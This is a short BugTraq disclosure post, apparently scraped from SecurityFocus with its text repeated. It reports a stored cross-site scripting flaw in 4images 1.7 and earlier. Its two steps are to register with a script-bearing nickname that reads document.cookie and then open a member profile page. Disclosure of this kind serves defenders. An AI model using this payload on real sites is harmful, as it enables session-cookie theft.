BugTraq
Back to list
|
Post reply
4images <= 1.7 XSS
Apr 20 2006 09:46AM
qex bsdmail org
====================
Discovered by: Qex
Date: 14 April 2006
====================
Steps:-
1- Register with this nickname:-
'><script>alert(document.cookie)</script>
2- Go to http://www.[SITE].com/[PATH]/member.php?action=showprofile&user_id=[ID]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Discovered by: Qex
Date: 14 April 2006
====================
Steps:-
1- Register with this nickname:-
'><script>alert(document.cookie)</script>
2- Go to http://www.[SITE].com/[PATH]/member.php?action=showprofile&user_id=[ID]
[ reply ]